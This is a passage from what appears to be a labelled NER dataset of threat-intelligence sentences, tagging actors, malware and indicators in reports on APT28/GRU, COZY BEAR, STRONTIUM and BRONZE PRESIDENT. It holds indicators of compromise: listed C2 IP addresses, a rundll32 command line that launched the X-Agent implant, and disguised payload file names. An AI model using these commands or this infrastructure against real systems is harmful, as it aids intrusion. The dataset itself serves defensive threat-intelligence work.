DllMain function only decrypts the data structures and initializes Windows API pointers .", "spans": [{"start": 71, "end": 78, "label": "System"}]} {"text": "The function \u201c NvMswt \u201d is a wrapper for the API function MsgWaitForMultipleObjects .", "spans": []} {"text": "The function \u201c NvReg \u201d is a wrapper for the API function RegisterClassW .", "spans": []} {"text": "The function \u201c NvStart \u201d is similar to the main function of the older module ; it creates a window and enters the message loop waiting for device arrival notifications .", "spans": []} {"text": "The only difference introduced is that an event named \u201c WerTyQ34C \u201d can be signalled by the function \u201c NvStop \u201d to terminate the message loop and stop processing .", "spans": []} {"text": "How they did it : GRU hackers .", "spans": []} {"text": "US elections .", "spans": []} {"text": "In a press briefing just two weeks ago , Deputy Attorney General Rod Rosenstein announced that the grand jury assembled by Special Counsel Robert Mueller had returned an indictment against 12 officers of Russia 's Main Intelligence Directorate of the Russian General Staff ( better known as Glavnoye razvedyvatel'noye upravleniye , or GRU ) .", "spans": [{"start": 291, "end": 329, "label": "Organization"}, {"start": 335, "end": 338, "label": "Organization"}]} {"text": "The indictment was for conducting \" active cyber operations with the intent of interfering in the 2016 presidential election . 
\" The espionage operation was run by Unit 26165 , commanded by GRU Officer Viktor Borisovich Netykshko .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 190, "end": 193, "label": "Organization"}]} {"text": "Unit 26165 appears to be the organization behind at least part of the \"threat group\" of tools , techniques , and procedures known as \" Fancy Bear , \" \" Sofacy , \" \" APT28 , \" and \" Sednit \" .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 135, "end": 145, "label": "Organization"}, {"start": 152, "end": 158, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}]} {"text": "Within the unit , two divisions were involved in the breaches : one specializing in operations and the second in development and maintenance of hacking tools and infrastructure .", "spans": []} {"text": "The operations division , supervised by Major Boris Alekseyevich Antonov , specialized in targeting organizations of intelligence interest through spear-phishing campaigns and the exploitation of stolen credentials .", "spans": []} {"text": "Antonov's group included Ivan Sergeyevich Yermakov and Senior Lieutenant Aleksey Viktorovich Lukashev , according to the indictment , and they were responsible for targeting the email accounts that were exposed on the \" DCLeaks \" site prior to the election operations .", "spans": [{"start": 178, "end": 183, "label": "System"}, {"start": 220, "end": 227, "label": "Organization"}]} {"text": "The second division , overseen by Lieutenant Colonel Sergey Aleksandrovich Morgachev , managed the development and maintenance of malware and hacking tools used by Unit 26165 , including the X-Agent \" implant \" .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 191, "end": 198, "label": "Malware"}]} {"text": "X-Agent is a signature tool of Fancy Bear operations\u2014a cross-platform backdoor toolset with 
variants for Windows , MacOS , Android , and iOS .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 115, "end": 120, "label": "System"}, {"start": 123, "end": 130, "label": "System"}, {"start": 137, "end": 140, "label": "System"}]} {"text": "The Windows and MacOS versions of X-Agent are capable of recording keystrokes , taking screenshots , and exfiltrating files from infected systems back to a command and control server .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 16, "end": 21, "label": "System"}, {"start": 34, "end": 41, "label": "Malware"}]} {"text": "Lieutenant Captain Nikolay Kozacheck ( who used the hacker monikers \" kazak \" and \" blablabla1234465 \" ) was the primary developer and maintainer of X-Agent , according to the indictment , and he was assisted by another officer , Pavel Yershov , in preparing it for deployment .", "spans": [{"start": 149, "end": 156, "label": "Malware"}]} {"text": "Once X-Agent was implanted on the DNC and DCCC networks , Second Lieutenant Artem Malyshev ( AKA \" djangomagicdev \" and \" realblatr \" ) monitored the implants through the command and control network configured for the task .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 34, "end": 37, "label": "System"}, {"start": 42, "end": 46, "label": "System"}]} {"text": "The information operations unit , Unit 74455 , was commanded by Colonel Aleksandr Vladimirovich Osadchuk .", "spans": [{"start": 34, "end": 44, "label": "Organization"}]} {"text": "Unit 74455 's members would be responsible for the distribution of some of the stolen data from the breaches through the \" DCLeaks \" and \" Guccifer 2.0 \" websites .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}]} {"text": "This group famously also 
reached out to WikiLeaks ( referred to as \" Organization 1 \" in the indictment ) to amplify their information operation , and they promoted the leaks to journalists through GRU -controlled email and social media accounts .", "spans": [{"start": 40, "end": 49, "label": "System"}, {"start": 198, "end": 201, "label": "Organization"}, {"start": 214, "end": 219, "label": "System"}]} {"text": "Within Unit 74455 , Officer Aleksy Potemkin\u2014a department supervisor\u2014oversaw information operations infrastructure .", "spans": [{"start": 7, "end": 17, "label": "Organization"}]} {"text": "His group configured the DCLeaks and Guccifer 2.0 blogs and social media accounts that would later be used to spread data stolen from the DNC , DCCC , and Clinton campaigns .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 138, "end": 141, "label": "System"}, {"start": 144, "end": 148, "label": "System"}]} {"text": "Bears in the Midst : Intrusion Into the Democratic National Committee .", "spans": [{"start": 40, "end": 69, "label": "Organization"}]} {"text": "There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere around the globe .", "spans": [{"start": 30, "end": 41, "label": "Organization"}]} {"text": "In all of these cases , we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks .", "spans": []} {"text": "But on rare occasions , a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers .", "spans": []} {"text": "This story is about one of those cases .", "spans": []} {"text": "CrowdStrike Services Inc. 
, our Incident Response group , was called by the Democratic National Committee ( DNC ) , the formal governing body for the US Democratic Party , to respond to a suspected breach .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 32, "end": 49, "label": "Organization"}, {"start": 76, "end": 105, "label": "Organization"}, {"start": 108, "end": 111, "label": "Organization"}]} {"text": "We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network \u2013 COZY BEAR and FANCY BEAR .", "spans": [{"start": 16, "end": 18, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}]} {"text": "We \u2019ve had lots of experience with both of these actors attempting to target our customers in the past and know them well .", "spans": []} {"text": "In fact , our team considers them some of the best threat actors out of all the numerous nation-state , criminal and hacktivist/terrorist groups we encounter on a daily basis .", "spans": []} {"text": "Their tradecraft is superb , operational security second to none and the extensive usage of \u2018 living-off-the-land \u2019 techniques enables them to easily bypass many security solutions they encounter .", "spans": []} {"text": "In particular , we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and \u2018 access management \u2019 tradecraft \u2013 both groups were constantly going back into the environment to change out their implants , modify persistent methods , move to new Command & Control channels and perform other tasks to try to stay ahead of being detected .", "spans": [{"start": 296, "end": 313, "label": "System"}]} {"text": "Both adversaries engage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are believed to be closely linked to the Russian government \u2019s 
powerful and highly capable intelligence services .", "spans": []} {"text": "COZY BEAR ( also referred to in some industry reports as CozyDuke or APT 29 ) is the adversary group that last year successfully infiltrated the unclassified networks of the White House , State Department , and US Joint Chiefs of Staff .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 57, "end": 65, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 185, "label": "Organization"}, {"start": 188, "end": 204, "label": "Organization"}, {"start": 214, "end": 235, "label": "Organization"}]} {"text": "In addition to the US government , they have targeted organizations across the Defense , Energy , Extractive , Financial , Insurance , Legal , Manufacturing Media , Think Tanks , Pharmaceutical , Research and Technology industries , along with Universities .", "spans": []} {"text": "Victims have also been observed in Western Europe , Brazil , China , Japan , Mexico , New Zealand , South Korea , Turkey and Central Asian countries .", "spans": []} {"text": "COZY BEAR \u2019s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "Once executed on the machine , the code will deliver one of a number of sophisticated Remote Access Tools ( RATs ) , including AdobeARM , ATI-Agent , and MiniDionis .", "spans": [{"start": 86, "end": 105, "label": "System"}, {"start": 108, "end": 112, "label": "System"}, {"start": 127, "end": 135, "label": "System"}, {"start": 138, "end": 147, "label": "System"}, {"start": 154, "end": 164, "label": "System"}]} {"text": "On many occasions , both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine , using a debugger , or located within a sandbox .", "spans": []} {"text": "They have extensive 
checks for the various security software that is installed on the system and their specific configurations .", "spans": []} {"text": "When specific versions are discovered that may cause issues for the RAT , it promptly exits .", "spans": [{"start": 68, "end": 71, "label": "System"}]} {"text": "These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection , and which would cause them to deploy a different tool instead .", "spans": []} {"text": "The implants are highly configurable via encrypted configuration files , which allow the adversary to customize various components , including C2 servers , the list of initial tasks to carry out , persistence mechanisms , encryption keys and others .", "spans": [{"start": 143, "end": 145, "label": "System"}]} {"text": "An HTTP protocol with encrypted payload is used for the Command & Control communication .", "spans": [{"start": 3, "end": 7, "label": "Indicator"}, {"start": 56, "end": 73, "label": "System"}]} {"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}]} {"text": "Their victims have been identified in the United States , Western Europe , Brazil , Canada , China , Georgia , Iran , Japan , Malaysia and South Korea .", "spans": []} {"text": "Extensive targeting of defense ministries and other military victims has been observed , the profile of which closely mirrors the strategic interests of the Russian government , and may indicate affiliation with GRU , Russia \u2019s premier military intelligence service .", "spans": 
[{"start": 212, "end": 215, "label": "Organization"}]} {"text": "This adversary has a wide range of implants at their disposal , which have been developed over the course of many years and include Sofacy , X-Agent , X-Tunnel , WinIDS , Foozer and DownRage droppers , and even malware for Linux , OSX , IOS , Android and Windows Phones .", "spans": [{"start": 132, "end": 138, "label": "Organization"}, {"start": 141, "end": 148, "label": "Malware"}, {"start": 151, "end": 159, "label": "System"}, {"start": 162, "end": 168, "label": "Malware"}, {"start": 171, "end": 177, "label": "Malware"}, {"start": 182, "end": 190, "label": "Malware"}, {"start": 223, "end": 228, "label": "System"}, {"start": 231, "end": 234, "label": "System"}, {"start": 237, "end": 240, "label": "System"}, {"start": 243, "end": 250, "label": "System"}, {"start": 255, "end": 262, "label": "System"}]} {"text": "This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target .", "spans": []} {"text": "Afterwards , they establish phishing sites on these domains that spoof the look and feel of the victim \u2019s web-based email services in order to steal their credentials .", "spans": [{"start": 116, "end": 121, "label": "System"}]} {"text": "FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France \u2019s TV5 Monde TV station in April 2015 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 95, "end": 104, "label": "Organization"}]} {"text": "At DNC , COZY BEAR intrusion has been identified going back to summer of 2015 , while FANCY BEAR separately breached the network in April 2016 .", "spans": [{"start": 3, "end": 6, "label": "Organization"}, {"start": 9, "end": 18, "label": "Organization"}, {"start": 86, "end": 96, "label": "Organization"}]} {"text": "We have identified no collaboration between the two actors , or even an 
awareness of one by the other .", "spans": []} {"text": "Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": []} {"text": "While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other \u2019s operations , in Russia this is not an uncommon scenario . \u201c Putin \u2019s Hydra : Inside Russia \u2019s Intelligence Services \u201d , a recent paper from European Council on Foreign Relations , does an excellent job outlining the highly adversarial relationship between Russia \u2019s main intelligence services \u2013 FSB , the primary domestic intelligence agency but one with also significant external collection and \u2018 active measures \u2019", "spans": [{"start": 451, "end": 454, "label": "Organization"}]} {"text": "remit , SVR , the primary foreign intelligence agency , and the aforementioned GRU .", "spans": [{"start": 79, "end": 82, "label": "Organization"}]} {"text": "Not only do they have overlapping areas of responsibility , but also rarely share intelligence and even occasionally steal sources from each other and compromise operations .", "spans": []} {"text": "Thus , it is not surprising to see them engage in intrusions against the same victim , even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations .", "spans": []} {"text": "The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation ( WMI ) system , which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 48, "end": 56, "label": "Malware"}, {"start": 78, "end": 
84, "label": "System"}, {"start": 103, "end": 109, "label": "System"}, {"start": 122, "end": 132, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 184, "end": 210, "label": "System"}, {"start": 213, "end": 216, "label": "System"}]} {"text": "The Powershell backdoor is ingenious in its simplicity and power .", "spans": [{"start": 4, "end": 14, "label": "System"}]} {"text": "This one-line powershell command , stored only in WMI database , establishes an encrypted connection to C2 and downloads additional powershell modules from it , executing them in memory .", "spans": [{"start": 14, "end": 24, "label": "System"}, {"start": 50, "end": 53, "label": "System"}, {"start": 104, "end": 106, "label": "System"}, {"start": 132, "end": 142, "label": "System"}]} {"text": "In theory , the additional modules can do virtually anything on the victim system .", "spans": []} {"text": "The encryption keys in the script were different on every system .", "spans": []} {"text": "Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 44, "end": 52, "label": "Malware"}]} {"text": "FANCY BEAR adversary used different tradecraft , deploying X-Agent malware with capabilities to do remote command execution , file transmission and keylogging .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 59, "end": 66, "label": "Malware"}]} {"text": "It was executed via rundll32 commands such as : rundll32.exe \u201c C:\\Windows\\twain_64.dll \u201d .", "spans": [{"start": 48, "end": 60, "label": "Indicator"}, {"start": 63, "end": 86, "label": "Indicator"}]} {"text": "In addition , FANCY BEAR \u2019s X-Tunnel network tunneling tool , which facilitates connections to NAT-ed environments , was used to also execute remote commands .", "spans": [{"start": 14, "end": 24, "label": "Organization"}, 
{"start": 28, "end": 36, "label": "System"}, {"start": 95, "end": 101, "label": "System"}]} {"text": "Both tools were deployed via RemCOM , an open-source replacement for PsExec available from GitHub .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 69, "end": 75, "label": "System"}, {"start": 91, "end": 97, "label": "System"}]} {"text": "Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors .", "spans": []} {"text": "Regardless of the agency or unit tasked with this collection , the upcoming US election , and the associated candidates and parties are of critical interest to both hostile and friendly nation states .", "spans": []} {"text": "The 2016 presidential election has the world \u2019s attention , and leaders of other states are anxiously watching and planning for possible outcomes .", "spans": []} {"text": "Corporate IoT \u2013 a path to intrusion .", "spans": [{"start": 10, "end": 13, "label": "System"}]} {"text": "Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide .", "spans": [{"start": 63, "end": 66, "label": "System"}]} {"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight.Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 149, "end": 152, "label": "System"}]} {"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": [{"start": 14, "end": 26, "label": "System"}, {"start": 72, "end": 86, "label": "Organization"}]} {"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": [{"start": 83, "end": 
86, "label": "System"}]} {"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 52, "end": 55, "label": "System"}]} {"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": []} {"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called \u201c VPN Filter \u201d malware .", "spans": [{"start": 139, "end": 149, "label": "Malware"}]} {"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": [{"start": 4, "end": 7, "label": "Organization"}]} {"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": [{"start": 39, "end": 48, "label": "Organization"}, {"start": 49, "end": 75, "label": "System"}]} {"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": [{"start": 71, "end": 74, "label": "System"}, {"start": 87, "end": 97, "label": "System"}, {"start": 103, "end": 117, "label": "System"}, {"start": 126, "end": 139, "label": "System"}]} {"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": []} {"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer \u2019s passwords and in the third instance the latest security update had not been applied to the device .", "spans": []} {"text": "These devices became points of 
ingress from which the actor established a presence on the network and continued looking for further access .", "spans": []} {"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data .", "spans": []} {"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": [{"start": 36, "end": 39, "label": "System"}]} {"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": []} {"text": "As the actor moved from one device to another , they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting .", "spans": []} {"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": [{"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 112, "label": "System"}]} {"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": [{"start": 75, "end": 94, "label": "System"}, {"start": 97, "end": 99, "label": "System"}]} {"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]} {"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 
125, "end": 134, "label": "Organization"}]} {"text": "Since we identified these attacks in the early stages , we have not been able to conclusively determine what STRONTIUM \u2019s ultimate objectives were in these intrusions .", "spans": [{"start": 109, "end": 118, "label": "Organization"}]} {"text": "Over the last twelve months , Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM .", "spans": [{"start": 30, "end": 39, "label": "Organization"}, {"start": 143, "end": 152, "label": "Organization"}]} {"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": [{"start": 29, "end": 38, "label": "Organization"}]} {"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": [{"start": 21, "end": 30, "label": "Organization"}]} {"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": [{"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}]} {"text": "The \u201c VPN Filter \u201d malware has also been attributed to STRONTIUM by the FBI .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 72, "end": 75, "label": "Organization"}]} {"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": [{"start": 77, "end": 86, "label": "Organization"}]} {"text": "BRONZE PRESIDENT Targets NGOs .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 25, "end": 29, "label": "Organization"}]} {"text": "The activities 
of some non-governmental organizations ( NGOs ) challenge governments on politically sensitive issues such as social , humanitarian , and environmental policies .", "spans": [{"start": 23, "end": 53, "label": "Organization"}, {"start": 56, "end": 60, "label": "Organization"}]} {"text": "As a result , these organizations are often exposed to increased government-directed threats aimed at monitoring their activities , discrediting their work , or stealing their intellectual property .", "spans": []} {"text": "BRONZE PRESIDENT is a likely People's Republic of China ( PRC )-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 29, "end": 55, "label": "Organization"}, {"start": 58, "end": 61, "label": "Organization"}, {"start": 166, "end": 169, "label": "Organization"}]} {"text": "Secureworks Counter Threat Unit ( CTU ) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014 .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 34, "end": 37, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}]} {"text": "The BRONZE PRESIDENT cyberespionage group targets NGOs , as well as political and law enforcement organizations in countries in South and East Asia .", "spans": [{"start": 4, "end": 20, "label": "Organization"}]} {"text": "The threat group appears to have developed its own remote access tools that it uses alongside publicly available remote access and post-compromise toolsets .", "spans": []} {"text": "After compromising a network , the threat actors elevate their privileges and install malware on a large proportion of systems .", "spans": []} {"text": "The group runs custom batch scripts to collect specific file types and takes proactive steps to minimize 
detection of its activities .", "spans": []} {"text": "Analysis of a threat group's targeting , origin , and competencies can determine which organizations could be at risk .", "spans": []} {"text": "This information can help organizations make strategic defensive decisions in relation to the BRONZE PRESIDENT threat group .", "spans": [{"start": 94, "end": 110, "label": "Organization"}]} {"text": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 46, "label": "Organization"}, {"start": 66, "end": 70, "label": "Organization"}]} {"text": "The threat actors steal data from compromised systems over a long period of time , which likely indicates a long-term objective of monitoring the target's network .", "spans": []} {"text": "BRONZE PRESIDENT uses custom batch scripts to collect either specific file types ( including files with .pptx , .xlsx , .pdf extensions ) or all files within a specific location .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 104, "end": 109, "label": "Indicator"}, {"start": 112, "end": 117, "label": "Indicator"}, {"start": 120, "end": 124, "label": "Indicator"}]} {"text": "CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts , such as social media and webmail accounts .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "Additionally , CTU researchers have observed evidence of BRONZE PRESIDENT targeting political and law enforcement organizations in countries adjacent to the PRC , including Mongolia and India .", "spans": [{"start": 15, "end": 18, "label": "Organization"}, {"start": 57, "end": 73, "label": "Organization"}, {"start": 157, "end": 160, "label": "Organization"}]} {"text": "Some of the group's phishing lures suggest an interest in national security , humanitarian , and law 
enforcement organizations in the East , South , and Southeast Asia ( see Figure 1 ) .", "spans": []} {"text": "These examples reveal BRONZE PRESIDENT 's likely intent to conduct political espionage in other countries in addition to targeting NGOs .", "spans": [{"start": 22, "end": 38, "label": "Organization"}, {"start": 131, "end": 135, "label": "Organization"}]} {"text": "It is highly likely that BRONZE PRESIDENT is based in the PRC due to the following observations :", "spans": [{"start": 25, "end": 41, "label": "Organization"}, {"start": 58, "end": 61, "label": "Organization"}]} {"text": "The NGOs targeted by BRONZE PRESIDENT conduct research on issues relevant to the PRC .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 21, "end": 37, "label": "Organization"}, {"start": 81, "end": 84, "label": "Organization"}]} {"text": "Strong evidence links BRONZE PRESIDENT 's infrastructure to entities within the PRC .", "spans": [{"start": 22, "end": 38, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}]} {"text": "There are connections between a subset of the group's operational infrastructure and PRC-based Internet service providers .", "spans": [{"start": 85, "end": 94, "label": "Organization"}]} {"text": "Tools such as PlugX have historically been leveraged by threat groups operating in the PRC .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 87, "end": 90, "label": "Organization"}]} {"text": "It is likely that BRONZE PRESIDENT is sponsored or at least tolerated by the PRC government .", "spans": [{"start": 18, "end": 34, "label": "Organization"}, {"start": 77, "end": 80, "label": "Organization"}]} {"text": "The threat group's systemic long-term targeting of NGO and political networks does not align with patriotic or criminal threat groups .", "spans": [{"start": 51, "end": 54, "label": "Organization"}]} {"text": "BRONZE PRESIDENT has deployed a variety of remote access tools .", "spans": [{"start": 
0, "end": 16, "label": "Organization"}]} {"text": "The use of tools not previously observed by CTU researchers suggests that the group could have access to malware development capabilities .", "spans": [{"start": 44, "end": 47, "label": "Organization"}]} {"text": "BRONZE PRESIDENT also uses widely available or modified open-source tools , which could be a strategic effort to reduce the risk of attribution or to minimize the need for tool development resources .", "spans": [{"start": 0, "end": 16, "label": "Organization"}]} {"text": "Following a network compromise , the threat actors typically delete their tools and processes .", "spans": []} {"text": "However , the group is content leaving some malware on the network , likely to provide a contingency if other access channels are removed .", "spans": []} {"text": "When the group's activities were detected in one incident , it had elevated privileges and had maintained access to the targeted environment for several months .", "spans": []} {"text": "This finding indicates the group's effectiveness at maintaining long-term access to a targeted network .", "spans": []} {"text": "CTU researchers and Secureworks incident responders have observed BRONZE PRESIDENT using the following tools , along with several custom batch scripts for locating and archiving specific file types :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}]} {"text": "Cobalt Strike \u2014 This popular and commercially available penetration tool gains shell access to an infected system .", "spans": [{"start": 0, "end": 13, "label": "System"}]} {"text": "It allows threat actors to execute additional tools and perform post-intrusion actions on compromised systems .", "spans": []} {"text": "Cobalt Strike appears to be one of BRONZE PRESIDENT 's preferred remote access tools .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 35, "end": 51, "label": "Organization"}]} {"text": 
"During one intrusion , the threat actors installed it on over 70% of accessible hosts .", "spans": []} {"text": "The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable .", "spans": [{"start": 12, "end": 25, "label": "System"}, {"start": 70, "end": 81, "label": "Indicator"}, {"start": 108, "end": 121, "label": "System"}, {"start": 149, "end": 156, "label": "System"}, {"start": 157, "end": 168, "label": "Indicator"}]} {"text": "PlugX \u2014 This remote access Trojan ( RAT ) is popular among PRC-based targeted threat groups .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 59, "end": 68, "label": "Organization"}]} {"text": "Its functionality includes uploading and downloading files , and it has configurable network protocols .", "spans": []} {"text": "BRONZE PRESIDENT installs PlugX using DLL side-loading .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 26, "end": 31, "label": "Malware"}, {"start": 38, "end": 41, "label": "System"}]} {"text": "In June and August 2019 , BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures .", "spans": [{"start": 26, "end": 42, "label": "Organization"}, {"start": 53, "end": 58, "label": "Malware"}]} {"text": "ORat \u2014 CTU researchers have only observed this basic loader tool in the context of BRONZE PRESIDENT intrusions .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 7, "end": 10, "label": "Organization"}, {"start": 83, "end": 99, "label": "Organization"}]} {"text": "ORat is the name assigned by the malware author , as denoted by the program debug database string in the analyzed sample : D:\\vswork\\Plugin\\ORat\\build\\Release\\ORatServer\\Loader.pdb .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]} {"text": "The tool uses the Windows Management 
Instrumentation ( WMI ) event consumer for persistence by installing a script to the system's WMI registry .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 26, "end": 52, "label": "System"}, {"start": 55, "end": 58, "label": "System"}, {"start": 131, "end": 134, "label": "System"}]} {"text": "Messages sent from ORat to its command and control ( C2 ) server start with the string \"VIEWS0018x\" .", "spans": [{"start": 19, "end": 23, "label": "Malware"}, {"start": 31, "end": 50, "label": "System"}, {"start": 53, "end": 55, "label": "System"}]} {"text": "If the data received from the C2 server starts with the same string , then the remainder of the payload is decompressed using ORat 's \"deflate\" algorithm and called as a function .", "spans": [{"start": 30, "end": 32, "label": "System"}, {"start": 126, "end": 130, "label": "Malware"}]} {"text": "ORat acts as a flexible loader tool rather than a fully featured remote access tool .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]} {"text": "RCSession \u2014 This basic RAT is installed via DLL side-loading , and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 44, "end": 47, "label": "System"}, {"start": 67, "end": 70, "label": "Organization"}, {"start": 92, "end": 108, "label": "Organization"}]} {"text": "RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 54, "label": "Indicator"}, {"start": 83, "end": 94, "label": "Indicator"}]} {"text": "RCSession connects to its C2 server via a custom protocol , can remotely execute commands , and can launch additional tools .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 26, "end": 28, "label": "System"}]} {"text": "CTU researchers have no evidence of other threat actors using RCSession or of wide 
